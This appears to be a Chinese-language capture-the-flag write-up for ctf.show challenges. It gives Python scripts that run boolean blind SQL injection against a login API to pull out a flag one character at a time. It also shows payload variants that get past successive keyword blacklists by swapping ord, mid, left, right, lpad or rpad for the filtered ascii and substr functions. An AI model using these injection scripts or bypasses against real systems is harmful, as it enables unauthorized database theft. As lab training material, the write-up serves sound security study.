基礎指令碼
import requests
url = 'http://9980403b-660a-4aa7-90a0-c791e0e00ca6.challenge.ctf.show/api/index.php'
result = ''
i = 0
while True:
i = i + 1
low = 32
high = 127
while low < high:
mid = (low + high) // 2
data = {
"username": f"admin' and if(ascii(substr((select group_concat(f1ag)from ctfshow_fl0g),{i},1))>{mid},1,0)#",
"password": "1"
}
r = requests.post(url, data=data).text
if '\\u5bc6\\u7801\\u9519\\u8bef' in r:
low = mid + 1
else:
high = mid
if low != 32:
result += chr(low)
else:
break
print(result)
過濾1:
if(preg_match('/file|into|ascii/i', $username)){
繞過姿勢:使用ord代替ascii
data = {
"username": f"admin' and if(ord(substr((select group_concat(f1ag)from ctfshow_fl0g),{i},1))>{mid},1,0)#",
"password": "1"
}
過濾2:
if(preg_match('/file|into|ascii|ord|hex/i', $username)){
繞過姿勢:使用字典直接對比是否正確
import requests
url = "http://128f6cc0-3428-4086-8f43-384bac13bae8.challenge.ctf.show/api/index.php"
out = ''
dic = '{-}0123456789abcdefghijklmnopqrstuvwxyz'
for j in range(1, 50):
for k in dic:
data = {
'username': f"0'||if(substr((select group_concat(f1ag)from ctfshow_fl0g),{j},1)='{k}',1,0)#",
'password': '1'
}
re = requests.post(url, data=data)
if("\\u5bc6\\u7801\\u9519\\u8bef" in re.text):
out += k
print(out)
break
這種方式前兩種也可以直接出來,但是會慢一點
過濾3:
if(preg_match('/file|into|ascii|ord|hex|substr/i', $username)){
繞過姿勢:使用 mid 代替新增過濾 substr,也可以用left和right
data = {
'username': f"0'||if(mid((select group_concat(f1ag)from ctfshow_flxg),{j},1)='{k}',1,0)#",
'password': '1'
}
這裡的庫名改了
過濾4:
if(preg_match('/file|into|ascii|ord|hex|substr|char|left|right|substring/i', $username)){
繞過姿勢:lpad 和 rpad 也可以和上一個一樣用mid